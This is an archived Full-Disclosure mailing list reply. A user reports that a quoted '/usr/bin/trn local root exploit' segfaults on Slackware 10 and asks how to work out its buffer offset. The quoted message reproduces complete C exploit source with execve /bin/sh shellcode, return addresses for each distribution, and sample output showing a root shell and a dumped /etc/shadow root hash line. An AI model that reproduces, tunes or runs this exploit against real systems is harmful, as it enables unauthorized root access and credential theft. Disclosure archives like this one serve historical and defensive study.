lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: msh at datakill.us (msh at datakill) Subject: /usr/bin/trn local root exploit I just tested this on Slackware 10 and I get nothing but Segementation Faults. I see that you have the RET value filled in, but how am I to calculate what to use for the BOO? You use 142 and 128 in the example. On Wed, Jan 26, 2005 at 08:27:28AM +0000, Z z a g o r R wrote: > /* > /usr/bin/trn local root exploit > By ZzagorR - http://www.rootbinbash.com > */ > /* > sh-2.05b$ ./trn > usage : ./trn ret buf > example : ./trn 0xbfffff64 > [+] mandrake 9.2 = 0xbfffff96 > [+] slackware 10.0.0= 0xbfffff98 > [+] slackware 9.1.0= 0xbfffff84 > sh-2.05b$ > sh-2.05b$ ./trn 0xbfffff84 128 > [BOO %] 128 > [RET %] bfffff84 > sh-2.05b# > sh-2.05b# id > uid=0(root) gid=98(nobody) groups=98(nobody) > sh-2.05b# cat /etc/shadow > root:$1$N88/N.aP$dBWcFHiYCXXNb77Y5LPNK1:12705:0::::: > TEST : > MANDRAKE 9.2 > SLACKWARE 10.0.0 > SLACKWARE 9.1.0 > http://www.rootbinbas.com/d0kum4n/trn-test.txt > BOO: > $trn `perl -e 'print "A" x 120'` > $trn `perl -e 'print "A" x 124'` > $trn `perl -e 'print "A" x 128'` > Segmentation fault > BOO=128 > */ > > #include <stdio.h> > #include <string.h> > #define NEREDE "/usr/bin/trn" > > char caylarbeles[] = > "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" > "\x31\xc0\x50\x68\x2f\x2f\x73\x68" > "\x68\x2f\x62\x69\x6e\x89\xe3\x50" > "\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; > > int main(int argc, char *argv[]){ > int bizim; > char bufe[1000]; > char *tayfasi; > > if (argc < 3) { > printf ("{ trn l0c4l r00t 3xpl01t }\n"); > printf ("{ By ZzagorR - http://www.rootbinbash.com }\n"); > printf ("{ usage : %s ret buf }\n",argv[0]); > printf ("{ example : %s 0xbfffff99 142 }\n",argv[0]); > printf ("{ mandrake 9.2 = 0xbfffff96 }\n"); > printf ("{ slackware 10.0.0 = 0xbfffff98 }\n"); > printf ("{ slackware 9.1.0 = 0xbfffff84 }\n"); > exit(1); > }else{ > unsigned long RET=strtoul(argv[1], NULL, 16); > int BOO = atoi(argv[2]); > printf ("[BOO %] %i\n",BOO); > printf ("[RET %] %x\n",RET); > tayfasi = bufe; > memset(bufe, 0x41,256-strlen(caylarbeles)); > sprintf(bufe+256-strlen(caylarbeles), "%s", caylarbeles); > for ( bizim = BOO; bizim <= BOO+4; bizim+= 4 ) > *(long*)(tayfasi+bizim) = RET; > execl(NEREDE, NEREDE , bufe, NULL); > } > } > > _________________________________________________________________ > Yagmura yakalanmamak i?in sadece semsiyenize degil, MSN hava durumuna > g?venin! http://www.msn.com.tr/havadurumu/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > > -- _________________________ | | | http://datakill.us | | irc.datakill.us #dkchat | |_________________________|
Powered by blists - more mailing lists